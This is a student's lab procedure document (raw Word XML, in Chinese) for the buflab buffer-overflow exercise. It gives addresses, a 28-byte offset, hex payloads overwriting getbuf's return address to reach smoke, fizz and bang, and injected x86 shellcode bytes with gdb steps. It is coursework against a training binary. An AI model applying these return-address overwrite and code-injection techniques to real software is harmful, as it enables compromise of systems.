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color w:val="0B2545"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>实验四缓冲区溢出攻击实验全流程操作文档</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>报告人：姚泽棉    学号：2024150026    课程：计算机系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>一、实验目标</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>理解 32 位 x86 程序函数调用、栈帧结构和参数传递机制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>掌握通过缓冲区溢出覆盖返回地址的基本方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>能够使用 objdump、gdb、sendstring、makecookie 完成三个攻击关卡。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>二、实验材料与环境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</w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="E8EE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7160"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="E8EEF5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t>实验包</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>buflab-handout.tar，解压后包含 bufbomb、makecookie、sendstring。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>目标程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>bufbomb，其中 getbuf() 调用 Gets(buf)，存在缓冲区溢出漏洞。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>推荐环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Linux 32 位兼容环境。64 位 Linux 需要安装 32 位运行库，例如 gcc-multilib 或 libc6-i386。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>队伍名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>本文按 -t 2024150026 生成 cookie；若教师要求使用中文姓名，请在 Linux 中重新执行 ./makecookie 姓名。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0x5bae09c3，由 makecookie 2024150026 得到。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>三、准备工作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>将 buflab-handout.tar 放到 Linux 工作目录中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>执行 tar -xf buflab-handout.tar 解压实验包。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>执行 chmod +x bufbomb makecookie sendstring，确保三个程序可执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>执行 ./makecookie 2024150026，记录 cookie。本流程使用 cookie = 0x5bae09c3。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>如果 bufbomb 无法运行，先安装 32 位兼容库，再重新执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>四、静态分析结果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</w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="E8EE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7160"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="E8EEF5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680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>getbuf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0x08048ad0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0x08048da0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>smoke</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0x08048eb0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>fizz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0x08048e60</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>bang</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0x08048e10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>global_value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0x0804a1c4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>返回地址偏移</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>buf 位于 ebp-0x18，返回地址位于 ebp+0x04，偏移为 0x1c，即 28 字节。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>关键反汇编结论：getbuf 中 lea eax, [ebp-0x18] 取得缓冲区首地址，函数返回地址与缓冲区首地址相差 28 字节。因此任意 28 字节填充后继续写入 4 字节地址，就会覆盖 getbuf 的返回地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>五、第一关：跳转到 smoke()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>目标是在 getbuf 返回时不回到 test，而是跳转到 smoke。smoke 地址为 0x08048eb0，小端序写为 b0 8e 04 08。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:ind w:left="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exploit_smoke.txt 内容：</w:t>
        <w:br/>
        <w:t>00112233445566778899001122334455667788990011223344556677b08e0408</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:ind w:left="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>运行命令：</w:t>
        <w:br/>
        <w:t>cat exploit_smoke.txt | ./sendstring | ./bufbomb -t 2024150026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>预期结果：程序输出 Smoke!: You called smoke()，第一关通过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>六、第二关：跳转到 fizz(cookie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>目标是让 getbuf 返回到 fizz，并在 fizz 的第一个参数位置放入 cookie。fizz 地址为 0x08048e60，小端序为 60 8e 04 08；cookie 0x5bae09c3，小端序为 c3 09 ae 5b。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>覆盖返回地址后，栈顶下一项作为 fizz 的伪返回地址，再下一项是 fizz 的第一个参数。因此布局为：28 字节填充 + fizz 地址 + 4 字节伪返回地址 + cookie。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:ind w:left="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exploit_fizz.txt 内容：</w:t>
        <w:br/>
        <w:t>00112233445566778899001122334455667788990011223344556677608e040800000000c309ae5b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:ind w:left="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>运行命令：</w:t>
        <w:br/>
        <w:t>cat exploit_fizz.txt | ./sendstring | ./bufbomb -t 2024150026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>预期结果：程序识别传入的 cookie 与目标 cookie 一致，第二关通过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>七、第三关：修改 global_value 后跳转到 bang()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>目标是在跳转到 bang 前先执行一段注入代码，把 global_value 修改为 cookie。global_value 地址为 0x0804a1c4，bang 地址为 0x08048e10。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>注入代码逻辑如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:ind w:left="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>movl $0x5bae09c3, 0x0804a1c4</w:t>
        <w:br/>
        <w:t>push $0x08048e10</w:t>
        <w:br/>
        <w:t>ret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>对应机器码为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:ind w:left="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>c705c4a10408c309ae5b68108e0408c3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>第三关必须知道本次运行时 buf 的栈地址。用 gdb 取得 buf 首地址后，将该地址按小端序替换到模板末尾。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:ind w:left="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>gdb ./bufbomb</w:t>
        <w:br/>
        <w:t>(gdb) break *0x08048adc</w:t>
        <w:br/>
        <w:t>(gdb) run -t 2024150026</w:t>
        <w:br/>
        <w:t>(gdb) print/x $ebp-0x18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:ind w:left="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exploit_bang.txt 模板：</w:t>
        <w:br/>
        <w:t>c705c4a10408c309ae5b68108e0408c3909090909090909090909090&lt;buf首地址小端表示&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:ind w:left="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>运行命令：</w:t>
        <w:br/>
        <w:t>cat exploit_bang.txt | ./sendstring | ./bufbomb -t 2024150026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>预期结果：程序进入 bang，检测到 global_value 等于 cookie，第三关通过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>八、提交检查清单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>报告中写明实验目标、环境、漏洞原因、三关思路、关键地址、payload 构造和实验结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>截图建议包含 objdump 地址查询、makecookie 输出、三关运行成功输出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>第三关报告中要写清 buf 栈地址来自 gdb，本地址可能随运行环境变化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>不要修改原来的实验报告；本次已另建独立文档。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200" w:line="300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